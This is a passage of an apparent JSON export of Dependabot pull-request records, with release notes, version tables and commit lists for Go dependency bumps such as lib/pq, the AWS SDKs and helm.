\u0026quot;text\u0026quot;, \u0026quot;blob\u0026quot;, \u0026quot;nothing\u0026quot;))\r\n\u003cp\u003e// Replacement\ntx.Prepare(\u003ccode\u003ecopy temp (num, text, blob, nothing) from stdin\u003c/code\u003e)\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eSupport protocol 3.2, and the \u003ccode\u003emin_protocol_version\u003c/code\u003e and \u003ccode\u003emax_protocol_version\u003c/code\u003e DSN parameters (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1258\"\u003e#1258\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eSupport \u003ccode\u003esslmode=prefer\u003c/code\u003e and \u003ccode\u003esslmode=allow\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1270\"\u003e#1270\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eSupport \u003ccode\u003essl_min_protocol_version\u003c/code\u003e and \u003ccode\u003essl_max_protocol_version\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1277\"\u003e#1277\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eSupport connection service file to load connection details (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1285\"\u003e#1285\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eSupport \u003ccode\u003esslrootcert=system\u003c/code\u003e and use \u003ccode\u003e~/.postgresql/root.crt\u003c/code\u003e as the default value of sslrootcert (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1280\"\u003e#1280\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/lib/pq/issues/1281\"\u003e#1281\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eAdd a new \u003ccode\u003epqerror\u003c/code\u003e package with PostgreSQL error codes (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1275\"\u003e#1275\u003c/a\u003e).\u003c/p\u003e\n\u003cp\u003eFor example, to test if an error is a UNIQUE constraint violation:\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003eif pqErr, ok := errors.AsType[*pq.Error](https://github.com/lib/pq/blob/HEAD/err); ok \u0026amp;\u0026amp; pqErr.Code == pqerror.UniqueViolation {\r\n    log.Fatalf(\u0026quot;email %q already exsts\u0026quot;, email)\r\n}\n\u003c/code\u003e\u003c/pre\u003e\n\u003cp\u003eTo make this a bit more convenient, it also adds a \u003ccode\u003epq.As()\u003c/code\u003e function:\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/lib/pq/blob/master/CHANGELOG.md\"\u003egithub.com/lib/pq's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.12.3 (2026-04-03)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSend datestyle startup parameter, improving compatbility with database engines\nthat use a different default datestyle such as EnterpriseDB (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1312\"\u003e#1312\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/lib/pq/issues/1312\"\u003e#1312\u003c/a\u003e: \u003ca href=\"https://redirect.github.com/lib/pq/pull/1312\"\u003elib/pq#1312\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.12.2 (2026-04-02)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eTreat io.ErrUnexpectedEOF as driver.ErrBadConn so database/sql discards the\nconnection. Since v1.12.0 this could result in permanently broken connections,\nespecially with CockroachDB which frequently sends partial messages (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1299\"\u003e#1299\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/lib/pq/issues/1299\"\u003e#1299\u003c/a\u003e: \u003ca href=\"https://redirect.github.com/lib/pq/pull/1299\"\u003elib/pq#1299\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.12.1 (2026-03-30)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eLook for pgpass file in ~/.pgpass instead of ~/.postgresql/pgpass (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1300\"\u003e#1300\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eDon't clear password if directly set on pq.Config (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1302\"\u003e#1302\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/lib/pq/issues/1300\"\u003e#1300\u003c/a\u003e: \u003ca href=\"https://redirect.github.com/lib/pq/pull/1300\"\u003elib/pq#1300\u003c/a\u003e\n\u003ca href=\"https://redirect.github.com/lib/pq/issues/1302\"\u003e#1302\u003c/a\u003e: \u003ca href=\"https://redirect.github.com/lib/pq/pull/1302\"\u003elib/pq#1302\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev1.12.0 (2026-03-18)\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eThe next release may change the default sslmode from \u003ccode\u003erequire\u003c/code\u003e to \u003ccode\u003eprefer\u003c/code\u003e.\nSee \u003ca href=\"https://redirect.github.com/lib/pq/issues/1271\"\u003e#1271\u003c/a\u003e for details.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ccode\u003eCopyIn()\u003c/code\u003e and \u003ccode\u003eCopyInToSchema()\u003c/code\u003e have been marked as deprecated. These are\nsimple query builders and not needed for \u003ccode\u003eCOPY [..] FROM STDIN\u003c/code\u003e support (which\nis \u003cem\u003enot\u003c/em\u003e deprecated). (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1279\"\u003e#1279\u003c/a\u003e)\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e// Old\ntx.Prepare(CopyIn(\u0026quot;temp\u0026quot;, \u0026quot;num\u0026quot;, \u0026quot;text\u0026quot;, \u0026quot;blob\u0026quot;, \u0026quot;nothing\u0026quot;))\n\u003cp\u003e// Replacement\ntx.Prepare(\u003ccode\u003ecopy temp (num, text, blob, nothing) from stdin\u003c/code\u003e)\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eSupport protocol 3.2, and the \u003ccode\u003emin_protocol_version\u003c/code\u003e and\n\u003ccode\u003emax_protocol_version\u003c/code\u003e DSN parameters (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1258\"\u003e#1258\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eSupport \u003ccode\u003esslmode=prefer\u003c/code\u003e and \u003ccode\u003esslmode=allow\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1270\"\u003e#1270\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003eSupport \u003ccode\u003essl_min_protocol_version\u003c/code\u003e and \u003ccode\u003essl_max_protocol_version\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1277\"\u003e#1277\u003c/a\u003e).\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lib/pq/commit/1f3e3d92865dd313b4e146968684d7e3836c76e8\"\u003e\u003ccode\u003e1f3e3d9\u003c/code\u003e\u003c/a\u003e Send datestyle as a startup parameter (\u003ca href=\"https://redirect.github.com/lib/pq/issues/1312\"\u003e#1312\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/lib/pq/commit/32ba56b8f9c09...\n\n_Description has been truncated_","html_url":"https://github.com/TheThingsNetwork/lorawan-stack/pull/7880","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/TheThingsNetwork%2Florawan-stack/issues/7880","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/7880/packages"},{"uuid":"4213491276","node_id":"PR_kwDOFyRkIM7QSch6","number":10730,"state":"open","title":"Bump the all-go-mod-patch-and-minor group across 2 directories with 41 updates","user":"dependabot[bot]","labels":["ok-to-test","size/XXL","dependabot"],"assignees":[],"locked":false,"comments_count":3,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-04-06T18:54:49.000Z","updated_at":"2026-04-06T19:01:39.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"all-go-mod-patch-and-minor","update_count":41,"packages":[{"name":"github.com/aws/aws-sdk-go","old_version":"1.50.36","new_version":"1.55.8","repository_url":"https://github.com/aws/aws-sdk-go"},{"name":"github.com/aws/aws-sdk-go-v2","old_version":"1.30.1","new_version":"1.41.5","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/config","old_version":"1.26.6","new_version":"1.32.14","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/ec2","old_version":"1.167.1","new_version":"1.296.2","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/aws-sdk-go-v2/service/ecr","old_version":"1.27.4","new_version":"1.56.2","repository_url":"https://github.com/aws/aws-sdk-go-v2"},{"name":"github.com/aws/eks-anywhere-packages","old_version":"0.4.5","new_version":"0.4.15","repository_url":"https://github.com/aws/eks-anywhere-packages"},{"name":"github.com/aws/etcdadm-bootstrap-provider","old_version":"1.0.17","new_version":"1.0.19","repository_url":"https://github.com/aws/etcdadm-bootstrap-provider"},{"name":"github.com/aws/etcdadm-controller","old_version":"1.0.25","new_version":"1.0.27","repository_url":"https://github.com/aws/etcdadm-controller"},{"name":"github.com/bmc-toolbox/bmclib/v2","old_version":"2.1.1-0.20231206130132-1063371b9ed6","new_version":"2.3.5","repository_url":"https://github.com/bmc-toolbox/bmclib"},{"name":"github.com/docker/cli","old_version":"29.2.0+incompatible","new_version":"29.3.1+incompatible","repository_url":"https://github.com/docker/cli"},{"name":"github.com/go-git/go-git/v5","old_version":"5.17.1","new_version":"5.17.2","repository_url":"https://github.com/go-git/go-git"},{"name":"github.com/go-jose/go-jose/v3","old_version":"3.0.4","new_version":"3.0.5","repository_url":"https://github.com/go-jose/go-jose"},{"name":"github.com/nutanix-cloud-native/prism-go-client","old_version":"0.3.4","new_version":"0.7.1","repository_url":"https://github.com/nutanix-cloud-native/prism-go-client"},{"name":"github.com/onsi/gomega","old_version":"1.38.2","new_version":"1.39.1","repository_url":"https://github.com/onsi/gomega"},{"name":"github.com/spf13/cobra","old_version":"1.10.1","new_version":"1.10.2","repository_url":"https://github.com/spf13/cobra"},{"name":"github.com/vmware/govmomi","old_version":"0.51.0","new_version":"0.53.0","repository_url":"https://github.com/vmware/govmomi"},{"name":"golang.org/x/oauth2","old_version":"0.33.0","new_version":"0.36.0","repository_url":"https://github.com/golang/oauth2"},{"name":"gopkg.in/ini.v1","old_version":"1.67.0","new_version":"1.67.1"},{"name":"helm.sh/helm/v3","old_version":"3.18.5","new_version":"3.20.1","repository_url":"https://github.com/helm/helm"},{"name":"sigs.k8s.io/cluster-api/test","old_version":"1.11.1","new_version":"1.11.7","repository_url":"https://github.com/kubernetes-sigs/cluster-api"},{"name":"sigs.k8s.io/controller-runtime","old_version":"0.22.4","new_version":"0.22.5","repository_url":"https://github.com/kubernetes-sigs/controller-runtime"},{"name":"github.com/golang-jwt/jwt/v5","old_version":"5.2.2","new_version":"5.3.1","repository_url":"https://github.com/golang-jwt/jwt"},{"name":"github.com/itchyny/gojq","old_version":"0.12.17","new_version":"0.12.19","repository_url":"https://github.com/itchyny/gojq"},{"name":"k8s.io/kubelet","old_version":"0.29.5","new_version":"0.29.15","repository_url":"https://github.com/kubernetes/kubelet"}],"path":null,"ecosystem":"go"},"body":"Bumps the all-go-mod-patch-and-minor group with 24 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [github.com/aws/aws-sdk-go](https://github.com/aws/aws-sdk-go) | `1.50.36` | `1.55.8` |\n| [github.com/aws/aws-sdk-go-v2](https://github.com/aws/aws-sdk-go-v2) | `1.30.1` | `1.41.5` |\n| [github.com/aws/aws-sdk-go-v2/config](https://github.com/aws/aws-sdk-go-v2) | `1.26.6` | `1.32.14` |\n| [github.com/aws/aws-sdk-go-v2/service/ec2](https://github.com/aws/aws-sdk-go-v2) | `1.167.1` | `1.296.2` |\n| [github.com/aws/aws-sdk-go-v2/service/ecr](https://github.com/aws/aws-sdk-go-v2) | `1.27.4` | `1.56.2` |\n| [github.com/aws/eks-anywhere-packages](https://github.com/aws/eks-anywhere-packages) | `0.4.5` | `0.4.15` |\n| [github.com/aws/etcdadm-bootstrap-provider](https://github.com/aws/etcdadm-bootstrap-provider) | `1.0.17` | `1.0.19` |\n| [github.com/aws/etcdadm-controller](https://github.com/aws/etcdadm-controller) | `1.0.25` | `1.0.27` |\n| [github.com/bmc-toolbox/bmclib/v2](https://github.com/bmc-toolbox/bmclib) | `2.1.1-0.20231206130132-1063371b9ed6` | `2.3.5` |\n| [github.com/docker/cli](https://github.com/docker/cli) | `29.2.0+incompatible` | `29.3.1+incompatible` |\n| [github.com/go-git/go-git/v5](https://github.com/go-git/go-git) | `5.17.1` | `5.17.2` |\n| [github.com/go-jose/go-jose/v3](https://github.com/go-jose/go-jose) | `3.0.4` | `3.0.5` |\n| [github.com/nutanix-cloud-native/prism-go-client](https://github.com/nutanix-cloud-native/prism-go-client) | `0.3.4` | `0.7.1` |\n| [github.com/onsi/gomega](https://github.com/onsi/gomega) | `1.38.2` | `1.39.1` |\n| [github.com/spf13/cobra](https://github.com/spf13/cobra) | `1.10.1` | `1.10.2` |\n| [github.com/vmware/govmomi](https://github.com/vmware/govmomi) | `0.51.0` | `0.53.0` |\n| [golang.org/x/oauth2](https://github.com/golang/oauth2) | `0.33.0` | `0.36.0` |\n| gopkg.in/ini.v1 | `1.67.0` | `1.67.1` |\n| [helm.sh/helm/v3](https://github.com/helm/helm) | `3.18.5` | `3.20.1` |\n| [sigs.k8s.io/cluster-api/test](https://github.com/kubernetes-sigs/cluster-api) | `1.11.1` | `1.11.7` |\n| [sigs.k8s.io/controller-runtime](https://github.com/kubernetes-sigs/controller-runtime) | `0.22.4` | `0.22.5` |\n| [github.com/golang-jwt/jwt/v5](https://github.com/golang-jwt/jwt) | `5.2.2` | `5.3.1` |\n| [github.com/itchyny/gojq](https://github.com/itchyny/gojq) | `0.12.17` | `0.12.19` |\n| [k8s.io/kubelet](https://github.com/kubernetes/kubelet) | `0.29.5` | `0.29.15` |\n\nBumps the all-go-mod-patch-and-minor group with 10 updates in the /release/cli directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [github.com/aws/aws-sdk-go](https://github.com/aws/aws-sdk-go) | `1.54.12` | `1.55.8` |\n| [github.com/aws/aws-sdk-go-v2](https://github.com/aws/aws-sdk-go-v2) | `1.32.7` | `1.41.5` |\n| [github.com/aws/aws-sdk-go-v2/config](https://github.com/aws/aws-sdk-go-v2) | `1.26.6` | `1.32.14` |\n| [github.com/onsi/gomega](https://github.com/onsi/gomega) | `1.38.2` | `1.39.1` |\n| [github.com/spf13/cobra](https://github.com/spf13/cobra) | `1.10.1` | `1.10.2` |\n| [sigs.k8s.io/controller-runtime](https://github.com/kubernetes-sigs/controller-runtime) | `0.22.4` | `0.22.5` |\n| [github.com/itchyny/gojq](https://github.com/itchyny/gojq) | `0.12.17` | `0.12.19` |\n| [github.com/aws/aws-sdk-go-v2/service/kms](https://github.com/aws/aws-sdk-go-v2) | `1.37.9` | `1.50.4` |\n| [github.com/fsouza/go-dockerclient](https://github.com/fsouza/go-dockerclient) | `1.12.2-0.20250814055408-c31f6141d29b` | `1.13.1` |\n| [helm.sh/helm/v3](https://github.com/helm/helm) | `3.18.5` | `3.20.1` |\n\n\nUpdates `github.com/aws/aws-sdk-go` from 1.50.36 to 1.55.8\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/aws/aws-sdk-go/releases\"\u003egithub.com/aws/aws-sdk-go's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eRelease v1.55.8 (2025-07-31)\u003c/h1\u003e\n\u003ch3\u003eSDK Features\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eMark the module and all packages as deprecated.\n\u003cul\u003e\n\u003cli\u003eThis SDK has entered end-of-support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.7 (2025-04-22)\u003c/h1\u003e\n\u003ch3\u003eSDK Bugs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eservice/s3/s3manager\u003c/code\u003e: Abort multipart download if object is modified during download\n\u003cul\u003e\n\u003cli\u003eFixes \u003ca href=\"https://redirect.github.com/aws/aws-sdk-go/issues/4986\"\u003e4986\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.6 (2025-01-15)\u003c/h1\u003e\n\u003ch3\u003eSDK Bugs\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix broken printf for go1.24\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.5 (2024-07-30)\u003c/h1\u003e\n\u003ch3\u003eService Client Updates\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eservice/appstream\u003c/code\u003e: Updates service API and documentation\n\u003cul\u003e\n\u003cli\u003eAdded support for Red Hat Enterprise Linux 8 on Amazon AppStream 2.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/autoscaling\u003c/code\u003e: Updates service API and documentation\n\u003cul\u003e\n\u003cli\u003eIncrease the length limit for VPCZoneIdentifier from 2047 to 5000\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/codepipeline\u003c/code\u003e: Updates service API, documentation, and paginators\n\u003cul\u003e\n\u003cli\u003eAWS CodePipeline V2 type pipelines now support stage level conditions to enable development teams to safely release changes that meet quality and compliance requirements.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/elasticache\u003c/code\u003e: Updates service documentation\n\u003cul\u003e\n\u003cli\u003eDoc only update for changes to deletion API.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/elasticloadbalancing\u003c/code\u003e: Updates service API\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/eventbridge\u003c/code\u003e: Updates service API\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/logs\u003c/code\u003e: Updates service API\n\u003cul\u003e\n\u003cli\u003eAdd v2 smoke tests and smithy smokeTests trait for SDK testing.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/models.lex.v2\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/rolesanywhere\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/tnb\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/workspaces\u003c/code\u003e: Updates service documentation\n\u003cul\u003e\n\u003cli\u003eRemoving multi-session as it isn't supported for pools\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003eRelease v1.55.4 (2024-07-29)\u003c/h1\u003e\n\u003ch3\u003eService Client Updates\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eservice/elasticache\u003c/code\u003e: Updates service documentation\n\u003cul\u003e\n\u003cli\u003eRenaming full service name as it appears in developer documentation.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eservice/memorydb\u003c/code\u003e: Updates service API and documentation\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/070853e88d22854d2355c2543d0958a5f76ad407\"\u003e\u003ccode\u003e070853e\u003c/code\u003e\u003c/a\u003e release v1.55.8 (2025-07-31)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bb0168ecfa52f8809b27912ded94edafaa019512\"\u003e\u003ccode\u003ebb0168e\u003c/code\u003e\u003c/a\u003e Add deprecation warnings everywhere and remove some README content\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/7ce44f3b563e6c00488bc9c81fb12ef232d72d93\"\u003e\u003ccode\u003e7ce44f3\u003c/code\u003e\u003c/a\u003e aws\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/6d9a26d85968c06f7e83b3233c5454b93c1ccfd8\"\u003e\u003ccode\u003e6d9a26d\u003c/code\u003e\u003c/a\u003e remove doc issue tmpl\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/239002f260fd543fe03fbd154d3033777d2bcd30\"\u003e\u003ccode\u003e239002f\u003c/code\u003e\u003c/a\u003e deprecate service packages and HLLs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/70c4177b8fdf98fa35e7286fd7881276d7490540\"\u003e\u003ccode\u003e70c4177\u003c/code\u003e\u003c/a\u003e deprecate main runtime packages\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/bbdd4e9bc5e4f2795f25486b84b202d689efc632\"\u003e\u003ccode\u003ebbdd4e9\u003c/code\u003e\u003c/a\u003e deprecate\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/163aada692ed32951f979aacf452ded4c03b8a7c\"\u003e\u003ccode\u003e163aada\u003c/code\u003e\u003c/a\u003e release v1.55.7 (2025-04-22) (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go/issues/5346\"\u003e#5346\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/9eb2bfd2f949fc81b96cee6b5aae6d9b84abea75\"\u003e\u003ccode\u003e9eb2bfd\u003c/code\u003e\u003c/a\u003e Abort multi part download if the object is modified during download\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go/commit/8d203ccff393340d080be0417d091cc60354449b\"\u003e\u003ccode\u003e8d203cc\u003c/code\u003e\u003c/a\u003e Update bug-report.yml\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go/compare/v1.50.36...v1.55.8\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2` from 1.30.1 to 1.41.5\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/90650dd22735ab68f6089ae5c39b6614286ae9ec\"\u003e\u003ccode\u003e90650dd\u003c/code\u003e\u003c/a\u003e Release 2026-03-26\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/dd88818bee7d632a8b9da6e2c78ef92e23c94c62\"\u003e\u003ccode\u003edd88818\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/b662c50138bd393927871b46e84ee3483377f5be\"\u003e\u003ccode\u003eb662c50\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/500a9cb3522a0e71d798d7079ff5856b23c2cac1\"\u003e\u003ccode\u003e500a9cb\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/6221102f763bd65d7e403fa62c3a1e3d39e24dc6\"\u003e\u003ccode\u003e6221102\u003c/code\u003e\u003c/a\u003e fix stale skew and delayed skew healing (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3359\"\u003e#3359\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/0a39373433a121800bc68efa743a7486eb07aa3f\"\u003e\u003ccode\u003e0a39373\u003c/code\u003e\u003c/a\u003e fix order of generated event header handlers (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3361\"\u003e#3361\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/098f3898271e2eaaf8a92e38d1d928fb018805a6\"\u003e\u003ccode\u003e098f389\u003c/code\u003e\u003c/a\u003e Only generate resolveAccountID when it's required (\u003ca href=\"https://redirect.github.com/aws/aws-sdk-go-v2/issues/3360\"\u003e#3360\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/6ebab66428e97db0ee252fea042d56b1313cb9f6\"\u003e\u003ccode\u003e6ebab66\u003c/code\u003e\u003c/a\u003e Release 2026-03-25\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/b2ec3beebb986a5e74e50d0c105119d84e1e934e\"\u003e\u003ccode\u003eb2ec3be\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/abc126f6b35bfe2f77e2505f6d04f8ceced971ee\"\u003e\u003ccode\u003eabc126f\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/aws/aws-sdk-go-v2/compare/v1.30.1...v1.41.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/aws/aws-sdk-go-v2/config` from 1.26.6 to 1.32.14\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/d15107640a5073c5ce53dc395210858e316d5e82\"\u003e\u003ccode\u003ed151076\u003c/code\u003e\u003c/a\u003e Release 2026-04-02\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e33c9a9f67577e2dd5fcd3b15b9a8a2e83683f53\"\u003e\u003ccode\u003ee33c9a9\u003c/code\u003e\u003c/a\u003e Regenerated Clients\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/e06655901c88ef90432f41a7b9c92b33b4537c75\"\u003e\u003ccode\u003ee066559\u003c/code\u003e\u003c/a\u003e Update endpoints model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/a635ee4303d8cac381be8788519a1a8bba5ccf12\"\u003e\u003ccode\u003ea635ee4\u003c/code\u003e\u003c/a\u003e Update API model\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/9074b3ddace9c195f00993c8ae509bc8977a6c4c\"\u003e\u003ccode\u003e9074b3d\u003c/code\u003e\u003c/a\u003e Release 2026-04-01\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/aws/aws-sdk-go-v2/commit/f6ad4c082d3a1995b9add26af4eb7553b13df252\"\u003e\u003ccode\u003ef6ad4c0\u003c/code\u003e\u003c/a\u003e Regenerated 